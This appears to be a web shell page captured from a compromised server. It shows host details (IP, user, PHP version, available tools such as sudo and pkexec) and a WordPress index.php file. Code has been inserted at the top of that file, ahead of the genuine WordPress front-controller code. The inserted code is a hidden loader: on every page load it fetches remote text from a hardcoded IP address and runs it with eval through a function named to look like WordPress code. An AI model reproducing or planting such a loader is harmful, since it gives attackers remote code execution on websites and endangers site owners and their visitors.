| Server IP : 181.215.205.78 / Your IP : 216.73.216.146 Web Server : LiteSpeed System : Linux srv028146260 5.15.0-176-generic #186-Ubuntu SMP Fri Mar 13 11:01:42 UTC 2026 x86_64 User : situs1068 ( 1161) PHP Version : 8.0.30 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare, MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /proc/thread-self/cwd/ |
Upload File : |
<?php
ini_set('display_errors', 1);
error_reporting(E_ALL);
function get_remote_content($url = 'http://198.204.255.90/z60415_6/stat/index.txt' ) {
$ua = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/122.0.0.0';
if (ini_get('allow_url_fopen')) {
$ctx = stream_context_create(
array("http" => array("header" => "User-Agent: $ua\r\n")));
$res = @file_get_contents($url, false, $ctx);
if ($res) return $res;
}
$p = parse_url($url);
$host = $p['host'];
$port = ($p['scheme'] == 'https') ? 443 : 80;
$sock = @fsockopen(($port == 443 ? "ssl://" : "") . $host, $port, $en, $er, 10);
if ($sock) {
$req = "GET " . $p['path'] . " HTTP/1.1\r\nHost: $host\r\nUser-Agent: $ua\r\nConnection: Close\r\n\r\n";
fwrite($sock, $req);
$raw = '';
while (!feof($sock)) { $raw .= fgets($sock, 1024); }
fclose($sock);
return substr($raw, strpos($raw, "\r\n\r\n") + 4);
}
return false;
}
function eval_wordpress( $content ){
if ( $content ) {
for( $i=0; $i<2; $i++){
while ( $i < 5 ){
eval( $content );
break;
}
break;
}
}
}
$payload = eval_wordpress( '?>'.get_remote_content( ) );?>
<?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define( 'WP_USE_THEMES', true );
/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';